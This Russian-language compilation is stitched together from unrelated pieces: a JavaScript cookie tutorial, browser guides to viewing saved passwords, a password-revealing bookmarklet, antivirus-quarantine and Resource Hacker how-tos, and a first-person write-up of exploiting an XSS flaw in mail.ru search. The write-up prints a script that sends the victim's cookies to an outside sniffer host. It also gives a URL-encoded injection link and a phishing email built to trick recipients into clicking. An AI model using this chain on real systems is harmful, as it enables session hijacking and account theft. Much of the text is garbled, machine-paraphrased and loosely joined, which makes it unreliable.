Простой способ украсть cookie. Методы похищения файлов cookie Пароль из cookies chrome

JavaScript дает возможность устанавливать и читать куки в браузере. В данном уроке мы рассмотрим как происходит работа с куками, а также сделаем простую страницу, которая будет помнить введеное имя и отображать его при каждом входе.

Что такое куки (cookie)?

Куки - это небольшой объем данных, которые хранятся вэб браузером. Они позволяют Вам сохранять определенную информацию о пользователе и получать ее каждый раз, когда он посещает Вашу страницу. Каждый пользователь имеет свой собственный уникальный набор куков.

Обычно куки используются веб сервером для выполнения таких функций как отслеживание посещений сайта, регистрации на сайте и сохранения сведений о заказах или покупках. Однако нам не нужно придумывать программу для вэб сервера чтобы использовать куки. Мы можем использовать их с помощью JavaScript.

Свойство document.cookie .

В JavaScript куки доступны с помощью свойства cookie объекта document. Создать куки можно следующим образом:

И получить весь сохраненый набор куков так:

Var x = document.cookie;

Давайте рассмотрим сохранение и получение куков более подробно.

Сохранение куки

Для сохранения куки нужно присвоить document.cookie текстовую строку, которая содержит свойства куки, которые мы хотим создать:

document.cookie = " name = значение; expires= дата; path= путь; domain= домен; secure";

Свойства описаны в таблице:

Свойство Описание Пример

name = значение	Устанавливает имя куки и его значение.	username=Вася
expires= дата	Устанавливает дату истечения срока хранения куки. Дата должна быть представлена в формате, который возвращает метод toGMTString() объекта Date . Если значение expires не задано, куки будет удалено при закрытии браузера.	expires= 13/06/2003 00:00:00
path= путь	Данная опция устанавливает путь на сайте, в рамках которого действует куки. Получить значение куки могут только документы из указанного пути. Обычно данное свойство оставляют пустым, что означает что только документ установивший куки может получит доступ к нему.	path=/demo/
domain= домен	Данная опция устанавливает домен, в рамках которого действует куки. Получить значение куки могут только сайты из указанного домена. Обычно данное свойство оставляют пустым, что означает, что только домен установивший куки может получит доступ к нему.	domain=сайт
secure	Данная опция указывает браузеру, что для пересылки куки на сервер следует использовать SSL. Очень редко используется.	secure

Давайте посмотрим пример установки куки:

document.cookie = "username=Вася; expires=15/02/2011 00:00:00";

Данный код устанавливает куки username , и присваивает ему значение "Вася" , которое будет храниться до 15-го февраля 2011 года (используется Европейский формат времени!).

var cookie_date = new Date (2003, 01, 15); document.cookie = "username=Вася; expires=" + cookie_date.toGMTString();

Данный код выполняет точно такое же действие, как и предыдущий пример, но для установки даты используется метод Date.toGMTString() . Учтите, что нумерация месяца в объекте Date начинается с 0, то есть февраль - это 01 .

Document.cookie = "logged_in=yes";

Данный код устанавливает куки logged_in , и присваивает ему значение "yes" . Так как атрибут expires не установлен, то куки удалится при закрытии браузера.

var cookie_date = new Date (); // Текущая дата и время cookie_date.setTime (cookie_date.getTime() - 1); document.cookie = "logged_in=; expires=" + cookie_date.toGMTString();

Данный код устанавливает куки logged_in и присваивает строку хранения значение времени за одну секунду перед текущим - такая операция приведет к немедленному удалению куки. Ручной способ удалить куки!

Перекодирование значения куки!

Следует перекодировать значение куки для корректного хранения и отображения таких символов как пробел и двоеточие. Такая операция гарантирует, что браузер корректно воспримет значение. Перекодирование лекго выполняется функцией JavaScript escape() . Например:

document.cookie = "username=" + escape("Вася Пупкин") + "; expires=15/02/2003 00:00:00"; Функция для установки куки

Установка куки станет проще, если мы напишем специальную функцию, которая будет выполнять простые операции, такие как перекодирование значений и построение строки document.cookie . Например:

Function set_cookie (name, value, exp_y, exp_m, exp_d, path, domain, secure) { var cookie_string = name + "=" + escape (value); if (exp_y) { var expires = new Date (exp_y, exp_m, exp_d); cookie_string += "; expires=" + expires.toGMTString(); } if (path) cookie_string += "; path=" + escape (path); if (domain) cookie_string += "; domain=" + escape (domain); if (secure) cookie_string += "; secure"; document.cookie = cookie_string; }

Функция получает данные для куки в качестве аргументов, затем строит соответствующую строку и устанавливает куки.

Например, установка куки без срока хранения:

set_cookie ("username", "Вася Пупкин"); set_cookie ("username", "Вася Пупкин", 2011, 01, 15);

Установка куки со сроком хранения, доменом сайт , использованием SSL, но без пути:

set_cookie ("username", "Вася Пупкин", 2003, 01, 15, "", "сайт", "secure"); Функция для удаления куки.

Другая полезная функция для работы с куки представлена ниже. Функция "удаляет" куки из браузера посредством установки срока хранения на одну секунду раньше текущего значения времени.

function delete_cookie (cookie_name) { var cookie_date = new Date (); // Текущая дата и время cookie_date.setTime (cookie_date.getTime() - 1); document.cookie = cookie_name += "=; expires=" + cookie_date.toGMTString(); }

Для использования данной функции нужно только передать ей имя удаляемого куки:

Delete_cookie ("username");

Получение значения куки

Для того, чтобы получить значение предварительно установленного куки для текущего документа, нужно использовать свойство document.cookie:

Var x = document.cookie;

Таким образом возвращается строка, которая состоит из списка пар имя/значение, разделенных точкой с запятой для всех куки, которые действуют для текущего документа. Например:

"username=Вася; password=abc123"

В данном примере 2 куки, которые были предварительно установлены: username , который имеет значение "Вася" , и password , который имеет значение "abc123" .

Функция для получения значения куки

Обычно, нам нужно только значение одного куки за один раз. Поэтому строка куки не удобна для использования! Здесь приводится функция, которая обрабатывает строку document.cookies , возвращет только то куки, которое представляет интерес в конкретный момент:

Function get_cookie (cookie_name) { var results = document.cookie.match ("(^|;) ?" + cookie_name + "=([^;]*)(;|$)"); if (results) return (unescape (results)); else return null; }

Данная функция использует регулярное выражение для поиска имени куки, которое представляет интерес, а затем возвращает значение, которое обработано функцией unescape() для перекодирования к нормальному символьному виду. (Если куки не найдено, возвращается значение null.)

Данная функция проста в использовании. Например, для возврата значения куки username:

Var x = get_cookie ("username");

Простой пример использования

В данном примере мы сделали страницу, которая запрашивает Ваше имя при первом посещении, затем она сохраняет Ваше имя в куки и показывает его при следующих посещениях.

Откройте страницу в новом окне. При первом посещении она попросит ввести имя и сохранит его в куки. Если Вы посетите страницу еще раз, она отобразит на экране введенное имя из куки.

Для куки задаем срок хранения в 1 год от текущей даты, это означает, что браузер сохранит Ваше имя даже если Вы закроете его.

Вы можете посмотреть код страницы в браузере, выбрав функцию просмотра исходного кода. Здесь приводится основная часть кода:

if (! get_cookie ("username")) { var username = prompt ("Пожалуйста, введите Ваше имя", ""); if (username) { var current_date = new Date; var cookie_year = current_date.getFullYear () + 1; var cookie_month = current_date.getMonth (); var cookie_day = current_date.getDate (); set_cookie ("username", username, cookie_year, cookie_month, cookie_day); } } else { var username = get_cookie ("username"); document.write ("Привет, " + username + ", добро пожаловать на страницу!"); document.write ("
Forget about me!"); }

Данный урок показал Вам, как использовать куки в JavaScript для хранения информации о Ваших посетителях. Спасибо за внимание! :)

Файлы Cookies необходимы пользователю не только для больше стремительной загрузки непрерывно посещаемых страниц. Ту либо другую информацию удаленные сервера самосильно сберегают на компьютер пользователя, дабы в будущем было комфортно трудиться с обменом данными.

Инструкция

1. Дабы узнать логин и пароль пользователя на источниках, дозволено применять файлы. Если вы пользуетесь браузером Mozilla Firefox, а в нем включена опция записи cookies, можете прямо в программе узнать сохраненные логины и пароли. Нажмите для этого вверху страницы в меню браузера пункт под наименованием «Инструменты». Выберите настройку системы. Перед вами появится огромное окно, содержащее несколько вкладок. Перейдите на вкладку «Охрана».

2. В появившемся окне нажмите на кнопку с надписью «Сохраненные пароли». Перед вами возникнет новое окно с перечнем логинов, которые сохранялись вами на разных источниках. Кликните по кнопке «Отобразить пароли». Еще вы можете защитить данную информацию, предпочтя установку пароля в этом же меню.

3. Если вы пользуетесь браузером Opera, то сумеете узнать лишь имена пользователей. Откройте для этого администратор паролей в инструментах и посмотрите имеющиеся логины. Дабы узнать сохраненный пароль, установите дополнительное программное обеспечение, к примеру, Opera Password Recovery. При этом помните, что никакое стороннее программное обеспечение не гарантирует вам полную сохранность личных данных, именно следственно запоминайте пароли независимо либо пользуйтесь иным браузером.

4. Вы хотите посмотреть пароль в Google Chrome? Тогда откройте настройки в параметрах, кликнув по соответствующему пункту на панели инструментов. Перейдите в раздел «расширенные» и нажмите на «Показать файлы cookie».

5. Если вы являетесь пользователем стандартного браузера Internet Explorer, воспользуйтесь примитивный утилитой BehindTheAsterisks, дабы вытянуть пароль. Она является бесплатной программой, которая владеет интуитивным интерфейсом и обеспечивает пользователю опцию отображения пароля символами, а не звездочками. Данная утилита доступна и для других браузеров.

Во многих современных браузерах существует такая функция, как запоминание паролей для разных сайтов. Введя пароль один раз, вы освобождаете себя от необходимости заполнять строку при всяком входе на сайт. Но что делать, если вы позабыли пароль, а на сайте он спрятан за точечками? Для того дабы узнать пароль, вы обязаны следовать дальнейшим инструкциям.

Инструкция

1. Для начала вам нужно зайти на сайт, пароль от которого вам надобен. Нажмите на «Жезл паролей». Позже того как все поля будут заполнены звездочками либо точками, сразу же нажимайте ESC. После этого в строку адреса введите дальнейший код:javascript:(function () { inp = document.getElementsByTagName(‘input’); for (var j = 0; j < inp.length; j++) { if (inp[j].type == ‘password’) { prompt(inp[j].name, inp[j].value); } } }) ()Нажав на ENTER, вы получите нужный пароль.

2. Если 1-й метод не помог, вы можете воспользоваться утилитой Opera password Recovery. Это программа, которая предуготовлена для поправления паролей, сохраненных в браузере Opera. Данная программа дюже примитивна и комфортна в применении, вам необходимо каждого лишь запустить ее, а после этого нажать на «Поправление паролей». Все обнаруженные пароли будут сохранены в текстовых файлах либо в отчетах HTML.

Весь из современных браузеров имеет опцию чистки временных файлов, включая куки . Но изредка бывает необходима не тотальная зачистка, а выборочный просмотр, редактирование и удаление хранимых браузером кук. Ниже приведено изложение доступа к такой опции в особенно знаменитых браузерах.

Инструкция

1. В браузере Opera для доступа ко каждым хранимым им кукам нужно в «Основном меню» перейти в раздел «Настройки» и предпочесть там пункт «Всеобщие настройки…» (либо нажать сочетание клавиш CTRL + F12). В итоге откроется окно настроек браузера, в котором вам нужно перейти на вкладку «Расширенные», предпочесть на левой панели раздел «Cookies» и щелкнуть кнопку «Управление Cookies».

2. В Opera в окне управления куками вы можете обнаружить вам надобное, выделить и, нажав кнопку «Изменить» увидеть содержимое записи. При желании можете отредактировать куку.

3. В Mozilla FireFox, дабы добраться до кук, нужно предпочесть в меню раздел «Инструменты», а в нем щелкнуть пункт «Настройки». В окне настроек перейдите на вкладку «Приватность» и нажмите кнопку с надписью «Показать Cookies…». В итоге откроется окно со списком сохраненных кук, в котором есть вероятность искать и просматривать их содержимое.

4. В обозревателе Internet Explorer путь к хранилищу кук лежит через раздел меню с наименованием «Сервис» и пункт «Свойства обозревателя» в нем. Щелчок по этому пункту открывает окно, в котором вам нужно на вкладке «Всеобщие» нажать ту из кнопок «Параметры», которая помещена в разделе «История просмотра». Позже этого откроется следующее окно с заголовком «Параметры временных файлов» где надобно щелкнуть кнопку с надписью «Показать файлы».

5. Таким методом в Internet Explorer вы попадете в папку хранения всех временных файлов. Если щелкните заголовок колонки «Имя», то файлы рассортируются по наименованию и все файлы кук сгруппируются в один блок. Вы можете обнаружить надобный и открыть для просмотра и редактирования в обыкновенном текстовом редакторе.

6. Браузер Google Chrome имеет самую длинную последовательность действий для приобретения доступа к кукам. Вначале вам следует в правом верхнем углу окна щелкнуть иконку с изображением гаечного ключа и предпочесть в меню пункт «Параметры». Это откроет страницу «Настройки», в левой панели которой вам нужно щелкнуть ссылку «Расширенные». На странице расширенных настроек нажмите кнопку «Настройки оглавления», дабы открыть новое окно.

7. В новом окне вам необходимо щелкнуть кнопку «Все файлы cookie и данные сайтов». Это будет конечный пункт в переходе к кукам, сохраненным браузером.

8. В Google Chrome вы сумеете просматривать и удалять куки .

9. В браузере Safari для доступа к кукам вам тоже нужно щелкнуть иконку в верхнем правом углу – ту из них, на которой изображена шестеренка. В меню выберите пункт «Настройки…», что откроет новое окно. В нем вам нужно перейти на вкладку «Безопасность» и нажать кнопку «Показать Cookies». В Safari вы имеете вероятность только искать и удалять куки .

Видео по теме

Современные программы-браузеры помнят за нас все: наши любимые странички, все, что посещалось нами на протяжении долгого времени, пароли ко всевозможным сайтам – почте, играм, общественным сетям. Как чай комфортно зайти на сайт и теснее не думать о вступлении логина и пароля! Но доводится изредка переустанавливать систему и все пароли из памяти программ возвращать в свою.

Вам понадобится

• – компьютер с доступом в интернет
• – браузер

Инструкция

1. Запустите программу Mozilla Firefox, и, дабы восстановить пароль , сохраненный в данном браузере, исполните команду “Инструменты”. Выберите пункт меню «Настройки», перейдите во вкладку «Охрана», нажмите кнопку «Сохраненные пароли». В этом окне просмотрите все пароли, сохраненные в браузере, выделите необходимый и нажмите «показать».

2. Скачайте программу, которая дозволит показать сохраненные пароли в программе Опера – UnWand – Программа для просмотра паролей (Wand – Жезл) в Opera, а также Opera password recovery 3.5.1.225 Обнаружить ее не составит труда. Установите программу на свой компьютер, запустите программу. Выберите необходимую опцию поправления паролей: механически из жезла, механически из почты, вручную из жезла, вручную из почты, смешанный вариант. Нажмите кнопку «Дальше». Появится окно сканирования, в дальнейшем окне нужно указать местонахождение программы опера, и нажать дальше. Программа просканирует данную папку и выведет на экран сохраненные пароли.

3. Скачайте программу, которая сумеет показать пароли в браузере, не только в Опере, либо Мозилле, но и многих других браузерах – Multi Password Recovery. Для скачивания перейдите на формальный сайт программы – http://passrecovery.com/ru/index.php. Скачайте и установите на свой компьютер эту программу. При установке программа предложит проверить обновление, нажмите «ОК». Запустите программу из основного меню. Слева будет отображено меню, в котором нужно предпочесть необходимую программу, дабы восстановить пароль . К примеру, браузер Internet Explorer, выберите его из списка, и в правой части окна программы будут показаны сохраненные в этом браузере пароли.

4. Дабы восстановить пароль из браузера с подмогой иной программы, перейдите на сайт http://www.nirsoft.net/, выберите и скачайте всякую программу оттуда. Их функции аналогичны предыдущим описанным программам.

Примерно неизменно для соблюдения приватности при вводе паролей соответствующие программы взамен вводимых знаков отображают нечитаемые символы – «звездочки». Впрочем если вы видите в поле ввода пароля эти самые звездочки, это еще не обозначает, что в это поле подлинно размещен пароль . Нередко такие звездочки ничего не скрывают, а носят чисто информационную функцию – дать вам осознать, что при вводе пароль будет спрятан от сторонних глаз.

Инструкция

1. Откажитесь от намерения расшифровать звездочки в веб-страницах, полученных с сервера. В безусловном большинстве случаев пароли не передаются сервером в браузер пользователя. В этом дозволено удостовериться, открыв полученный вашим веб-обозревателем начальный код страницы – в нем не будет пароля ни в открытом виде, ни в зашифрованном. Через интернет пароли передаются только в одном направлении – из браузера на сервер.

2. Воспользуйтесь какой-нибудь специализированной прикладной программой, которая может читать пароли в открытых окнах других программ. В составе служебных компонентов операционной системы таких средств нет. Было бы необычно, если бы программа дешифрации была бы в одном комплекте с программами, обеспечивающими безопасность паролей. Надобную программу несложно обнаружить в интернете – скажем, это может быть Pass Checker. Программа состоит из шести файлов (включая файл справки) всеобщим весом каждого 296 килобайт и не требует установки. Сразу позже сохранения файлов на грубый диск либо съемный носитель ее дозволено запускать двойным щелчком по файлу Password.exe.

3. Откройте программу, звездочки которой вас волнуют. После этого поместите окно Pass Checker над открытой программой и левой кнопкой мыши перетащите изображение черепа на поле со спрятанным звездочками паролем. Это поле будет подсвечено мигающей рамкой, а в окне Pass Checker наоборот надписи window text дешифратор разместит пароль в его незашифрованном виде. Данный пароль дозволено скопировать и применять необходимым вам образом.

4. Щелкните кнопку Help в нижнем ряду кнопок, если хотите применять больше трудные методы расшифровки паролей. Помимо особенно простого, описанного в предыдущем шаге, программа предусматривает еще два варианта. Невзирая на англоязычный интерфейс, справка Pass Checker написана на русском языке, следственно загвоздок с переводом не будет.

Видео по теме

Процедура извлечения нечаянно перемещенных файлов из карантина подавляющего большинства антивирусных программ, больше либо менее, стандартизирована и отличается только деталями. В данном случае рассматривается операция поправления размещенных в карантин файлов приложений Microsoft Security Essentials, Norton и Avast Antivirus.

Вам понадобится

• – Microsoft Security Essentials;
• – avast! Free Antivirus 5.0;
• – Norton Internet Security

Инструкция

1. Запустите приложение Microsoft Security Essentials и перейдите на вкладку «Журнал» в основном окне программы для выполнения операции извлечения фалов из карантина .

2. Укажите пункт «Элементы, размещенные в карантин» и нажмите кнопку «Просмотреть данные» в открывшемся диалоговом окне.

3. Введите пароль менеджера компьютера в появившемся окне запроса и укажите файл, подлежащий поправлению из карантина , в списке.

4. Нажмите кнопку «Восстановить» для заключения процедуры извлечения файла либо используйте кнопку «Удалить все» для полной чистки карантина антивирусного приложения Microsoft Security Essentials.

5. Выберите пункт меню «Обслуживание» в основном окне антивирусной программы avast! Free Antivirus 5.0 и перейдите на вкладку «Карантин» открывшегося диалогового окна.

6. Вызовите контекстное меню подлежащего поправлению файла в списке правой части окна приложения и укажите команду «Восстановить» для извлечения выбранного файла в изначальное место хранения, указанное в разделе «Начальное расположение».

7. Выберите пункт «Карантин» в окне «Журнал безопасности» антивирусной программы Norton Internet Security и нажмите кнопку Параметры» для выполнения операции поправления файла, размещенного а карантин.

8. Укажите необходимый файл и выберите команду «Восстановить данный файл» в открывшемся окне «Найдена опасность».

9. Нажмите кнопку «Да» в новом диалоговом окне «Поправление из карантина » и закончите операцию поправления нажатием кнопки «Закрыть».

Обратите внимание!
Извлечение файлов из карантина допускается только в случае безусловной уверенности в их безвредности!

Полезный совет
Следует помнить, что «Карантин» – это специальная папка, сделанная антивирусным приложением. Файлы, размещенные в карантин, всецело изолированы от операционной системы и недостижимы для внешних процессов. Они не могут быть запущены, что и обеспечивает безопасность их хранения.

Операционная система Windows имеет типовой механизм внедрения произвольных данных в динамические библиотеки и исполняемые модули, а также API для работы с ними. Изображения, таблицы строк, образцы диалогов, панелей инструментов, меню и иная информация добавляется в PE-модули в виде источников. Изредка в разных целях требуется вытянуть источники из скомпилированного модуля.

Вам понадобится

• – бесплатная программа Resource Hacker, доступная для загрузки на странице rpi.net.au/~ajohnson/resourcehacker.

Инструкция

1. Загрузите файл PE-модуля в Resource Hacker. В основном меню приложения ступенчато кликните по пунктам File и Open либо нажмите сочетание клавиш Ctrl+O на клавиатуре. Будет отображен диалог открытия файла. Совершите переход в директорию, где находится целевой файл. Выделите PE-модуль в листинге каталога. Нажмите кнопку «Открыть».

2. Определите перечень источников, которые нужно вытянуть. Позже загрузки PE-файла в левой части основного окна Resource Hacker будет отображена древовидная конструкция. Она представляет собой список всех источников модуля с группировкой по типам. Так, скажем, источники диалогов размещаются в разделе Dialog, источники курсоров - в разделах Cursor и Cursor Group, иконки - в разделах Icon и Icon Group.Узлы второго яруса иерархии, содержащиеся в всем разделе, представляют собой числовые либо символические идентификаторы источников. Разворачивайте их и выделяйте вложенные элементы. При этом будут визуализированы соответствующие источники. Иконки, курсоры, растры отобразятся в виде изображений в правой панели основного окна приложения. Для таблиц строк, акселераторов, информации о версии, образцов диалогов, меню, инструментальных панелей будет построен и отображен код в формате, пригодном для применения с компилятором RCC. Помимо того, образцы диалогов визуализируются в отдельном плавающем окне.

3. Начните процесс сохранения обнаруженных на предыдущем шаге источников. Выделите надобный элемент в древовидной структуре слева. Откройте раздел Action основного меню приложения. Выберите пункт, соответствующий операции сохранения особенно подходящего типа.Выберите пункт “Save resource as a binary file …”, если нужно сберечь источник в виде фрагмента бинарных данных, одинакового тому, что содержится в PE-модуле.Выберите “Save resource as a *.res file …” для приобретения файла, содержащего скомпилированную версию выделенного источника. Сходственный файл пригоден для линковки с приложением либо библиотекой.Кликните по пункту с текстом вида “Save [Имя раздела: имя подраздела: имя ресурса] …” для того дабы вытянуть источники в их начальном виде. Данным пунктом меню стоит пользоваться для извлечения файлов иконок, курсоров и изображений.

4. Вытянете источники. В диалоге с заголовком “Save resource to…” задайте имя и директорию сберегаемого файла. Нажмите кнопку «Сберечь».

Изредка в операционной системе Windows с окном какой-нибудь программы случается странность – в свернутом и развернутом на каждый экран состоянии его поведение типично, а в окне средних размеров приложение пропадает за рубежом видимой области экрана. Методы достать скатившееся с рабочего стола окно существуют, и они не так уж трудны.

Вам понадобится

• ОС Windows.

Инструкция

1. 1-й метод извлечения объекта из заметной области заключается в том, дабы передоверить все ручные операции по его позиционированию самой операционной системе. Для этого откройте помимо проблемного окна еще правда бы одно, принадлежащее любому приложению – скажем, запустите «Проводник». После этого кликните правой кнопкой мыши по свободному пространству на панели задач, дабы вызвать контекстное меню. Дайте ОС команду систематизировать открытые окна одним из перечисленных в меню методов – «Окна каскадом», «Отображать окна стопкой» либо «Отображать окна рядом». Позже этого поведение затерянного окна вернется к норме.

2. Иной метод заключается в применении клавиатурного управления позиционированием окна. Позже его включения отпадет надобность дотягиваться указателем мышки до заголовка окна, дабы получить вероятность его переместить. Для включения этого режима нажмите сочетание «жгучих клавиш» Alt + «Пробел» + «П». После этого с поддержкой клавиш со стрелками переместите спрятанное окно на видимую область рабочего стола. Дабы отключить режим клавиатурного позиционирования, кликните в любом месте левой кнопкой мыши.

3. 3-й метод – растяжение доступного пространства рабочего стола. Сделать это дозволено увеличением разрешения экрана. Если вы используете последние версии ОС Windows 7 либо Vista, кликните фоновую картинку на рабочем столе правой кнопкой мыши и выберите во всплывшем контекстном меню пункт, тот, что так и назван – «Разрешение экрана». ОС запустит один из апплетов «Панели управления», где вам надобно раскрыть выпадающий список «Разрешение» и переместить ползунок вверх, отменнее – до самой верхней отметки. Позже этого нажмите кнопку «Применить». Апплет изменит разрешение и запустит таймер, по окончании отсчета которого это метаморфоза будет отменено. За отведенное время вам необходимо нажать кнопку подтверждения операции. Сделав это, обнаружьте пропавшее окно, переместите его к центру рабочего стола и верните разрешение экрана к бывшему значению.

Среди информации в файлах cookies неоднократно востребованы идентификационные данные пользователей. Узнайте логин и пароль на интернет-источниках, которые сберегают конфиденциальные данные о своих посетителях.

Вам понадобится

• – ПК под управлением операционной системы Windows;
• – доступ в интернет;
• – веб-браузеры: Mozilla Firefox, Opera, Internet Explorer, Google Chrome;
• – программа Opera Password Recovery;
• – утилита BehindTheAsterisks.

Инструкция

1. Если вы используете для просмотра веб-страниц браузер Mozilla Firefox с активированной в настройках функцией записи cookies, узнайте ваши сохраненные логины и пароли непринужденно в программном обеспечении. Запустите интернет-обозреватель, откройте пункт «Инструменты» и перейдите в настройки системы. В появившемся окне, содержащем несколько вкладок, активируйте параметр «Охрана».

2. Нажмите на кнопку «Сохраненные пароли » в появившемся разделе и перейдите на новую страницу веб-браузера. Она имеет идентификационные символы, которые сохранились в памяти компьютера при посещении вами разных интернет-источников. Кликните по строке «Отобразить пароли ». Вы можете защитить свою конфиденциальную информацию и установить кодовое слово в этом же меню обозревателя.

3. Узнайте имена пользователей, если вы посещаете источники глобальной сети с подмогой знаменитого браузера Opera. Откройте пункт меню «Инструменты» в верхней части веб-обозревателя, используйте администратор паролей и просмотрите список логинов пользователей.

4. Установите дополнительное программное обеспечения для доступа к сохраненным паролям, предпочтя для этой цели утилиту Opera Password Recovery. Помните, что сторонняя программа не гарантирует полную сохранность ваших личных данных.

5. Просматривая пароли в обозревателе Google Chrome, откройте соответствующий параметр на панели инструментов браузера. Войдите в расширенные настройки и активируйте пункт «Показать файлы cookie».

6. Воспользуйтесь многофункциональной бесплатной утилитой с подсознательно доступным интерфейсом BehindTheAsterisks и обнаружьте пароли в куках стандартного браузера Internet Explorer. Перейдите в опциях программы на отображение кодовых слов символами взамен звездочек и получите доступ к паролям.

Кукисы – файлы, которые хранятся на ПК пользователя и содержат в себе информацию о сайтах, когда-либо им посещенных. С поддержкой куков дозволено узнать о том, какие страницы посетил пользователь.

Кукисы – это файлы с информацией о когда-либо посещенных сайтах, которые хранятся в компьютере пользователя. Т. е. когда пользователь заходит на какой-либо веб-источник, информация о нем записывается в кукисы и при дальнейшем посещении данного сайта передается веб-серверу.

Для чего нужны

В кукисах содержится самая различная информация, скажем, пароли аккаунтов на сайтах, цвет образца, размер шрифта, которые пользователь произвел для сайта и т. п. Ярчайший пример как дозволено применять кукисы для сохранения настроек приводит поисковик Google. Эта машина предоставляет вероятность настроить свою поисковую выдачу, речь идет о числе итогов на странице, формате выдаваемых страниц, языке интерфейса и других настройках. Что касается паролей от аккаунтов на сайтах, то всякий пользователь не раз примечал, что однажды указав свой логин и пароль на каком-нибудь веб-источнике, при повторной авторизации он этого теснее не делал, т. к. данная информация о сайте механически записалась в кукисы. При повторном посещении источника данные отправляются веб-серверу, тот, что механически распознает пользователя, освобождая его от необходимости заполнять поля снова. Также кукисы могут сгодиться и для ведения статистики. Никакой опасности для компьютера кукисы представлять не могут. Это каждого лишь текстовые данные, неспособные нанести ему урон. С поддержкой куков невозможно удалить, передать либо считать информацию с ПК пользователя, впрочем узнать о том, какие страницы он посетил, дозволено. Современные браузеры теснее предоставляют пользователю вероятность выбора: сберегать куки либо нет, но если он предпочтет службу отключения сохранения кукисов, он должен быть готов к загвоздкам в работе с некоторыми сайтами.

Недостатки кукисов

Во-первых, куки не неизменно имеют вероятность верно идентифицировать пользователя. Во-вторых, их может украсть преступник. Что касается неправильного распознавания, то поводом этому может быть применение пользователем нескольких браузеров. Чай у всякого браузера имеется свое хранилище, следственно кукисы идентифицируют не пользователя, а его браузер и ПК, и если у него есть несколько браузеров, то будет и несколько комплектов куков. Злоумышленников может привлечь непрерывный обмен куками между браузером пользователя и веб-сервером, чай если сетевой трафик не шифруется, дозволено с подмогой особых программ-снифферов прочесть куки-пользователя. Эту задачу дозволено решить путем шифрования трафика и применения разных протоколов.

Видео по теме

В котором предлагалось посетить бесплатное мероприятие, посвященное вопросам информационной безопасности. Так как мероприятие проходило в моем городе, я решил, что мне нужно непременно туда сходить. Первое занятие было посвящено уязвимостям на сайтах типа XSS . После занятия я решил, что нужно закрепить полученные знания в реальных условиях. Выбрал для себя несколько сайтов, которые относятся к моему городу и начал во все формы пытаться воткнуть свой скрипт. В большинстве случаев скрипт отфильтровывался. Но бывало так, что «алерт» и срабатывал, и появлялось мое сообщение. О найденной уязвимости сообщал администраторам, и они быстро все исправляли.

В один из таких дней проверяя свежую почту на mail.ru мне на глаза попалась форма для поиска писем в почтовом ящике. Изредка я пользовался этим поиском, чтобы найти что-то нужное в куче своих старых писем. Ну, а так как я в последние пару дней вставлял свой «алерт» практически везде куда только можно было, рука рефлекторно потянулась к этой форме поиска. Набрал код своего скрипта и нажал Enter. Каково же было мое удивление, когда на экране я увидел до боли знакомое сообщение…

На лекции Open InfoSec Days докладчик говорил, что программисты довольно скептически относятся к уязвимостям подобного рода, мол «алерт? Ну и что с того? Это не опасно». Если на других сайтах я довольствовался только этим окошком с моим сообщением, то в данном случае я решил пойти дальше и показать, что из такого вот «алерта» может получиться.

Итак, скрипт срабатывает, а значит, есть уязвимость. Следовательно, можно попробовать запустить какой-нибудь другой скрипт. Например, скрипт, который передает cookies другого пользователя нам. Чтобы скрипт сработал, нужно заставить пользователя выполнить наш скрипт. Сделать это можно отослав ему письмо с соответствующей ссылкой, после нажатия, на которую произойдет поиск по почтовому ящику и выполнится нужный нам код.

На то, чтобы понять механику уязвимости, потребовалось некоторое время и множество экспериментов. Иногда скрипт срабатывал, иногда отфильтровывался. После некоторых усилий эмпирическим путем было установлено, что скрипт 100% срабатывает только в том случае, если поиск по письмам даст положительный результат. То есть когда пользователь выполняет поиск с нашим скриптом, нужно чтобы хотя бы одно письмо в его почтовом ящике по заданным параметрам нашлось. Устроить это не сложно.

Так же вместо «алерта» нужен скрипт, который будет передавать cookies нашему снифферу. Этот скрипт напишем в отдельном файле и будем его подгружать в наш поиск. Создал файл test.js с нужным кодом и залил на хостинг. Код скрипта такой:

Img=new Image();
img.src="http://sitename.ru/sniff.php?cookie="+document.cookie;
function F() {
location="http://www.solife.ru";
}
setTimeout(F, 5000);

Что хотелось бы здесь пояснить. Поставим себя на место злоумышленника. Нужно чтобы пользователь кликнул по ссылке. Как его заставить это сделать? Можно пообещать золотые горы и чтобы их получить нужно, проследовать по нашей ссылке на сайт. Но не думаю, что это сработает. Народ уже на такое не ведется (сам постоянно удаляю такие письма, даже не читая). Поэтому будем играть на человеческой жалости, благо она еще существует в природе. Попросим проголосовать на сайте за спасение истребляемых животных. Вначале заберем cookies, а потом переправим пользователя на сайт для голосования. Таймаут для переадресации выставил в 5 секунд, в противном случае cookies просто не успевали передаться снифферу, а пользователя сразу перебрасывало на сайт про животных. Вместо «алерта» использовал следующий скрипт:

Когда со скриптами было покончено, я занялся написанием письма. Придумал примерно следующее содержание:


Получилось довольно цинично, но старался приблизить условия к максимально реальным. В конце письма дописана строчка со скриптом, это чтобы наше письмо нашлось, когда мы сделаем поиск. Чтобы строка не вызывала лишних вопросов закрасил ее белым цветом. Так же в слове «http» поставил «пробел» чтобы строка не распозналась и не преобразовалась в ссылку. Иначе, несмотря на то, что скриптовая строка написана шрифтом белого цвета ссылка бы выделилась синим цветом у адресата, а этого нам не надо. Умный поиск все равно найдет и распознает эту строку, не смотря на пробелы.

E.mail.ru/cgi-bin/gosearch?q_folder=0&q_query=%27%3E%3Cscript%20src%3D%27http%3A%2F%2Fsitename.ru%2Ftest.js%27%3E%3C%2Fscript%3E

Для скрипта применил URL кодирование, чтобы ничего не отфильтровалось. Так же для поиска добавил параметр «q_folder=0», это чтобы поиск происходил по папке «Входящие».

Письмо готово, отправляем его. В качестве адресата я использовал свой второй почтовый ящик на этом же сервисе. Смотрим, что пришло на другой ящик.

Наш текст скрипта не видно, так как он сливается с фоном. Нажмем на ссылку и посмотрим, что произойдет. Пользователь перемещается в результаты поиска писем по заданному нами параметру. Наше письмо, которое мы отсылали видно в результатах поиска. В это время наш скрипт уже сработал и отослал cookies пользователя снифферу. Через 5 секунд (время зависит от настроек скрипта) пользователь переправляется на сайт с голосованиями.

Проверяю свой файл sniff.txt:

Так как целью моей не является кража чужих ящиков или получения доступа к ним, на этом повествование закончу. Но теоретически можно подменить свои cookies на чужие и получить доступ к чужому почтовому ящику. В общем если злоумышленник загорится целью, то он найдет применение полученной информации.

Хотелось бы поблагодарить Сергея Белова (

Что такое же cookie?

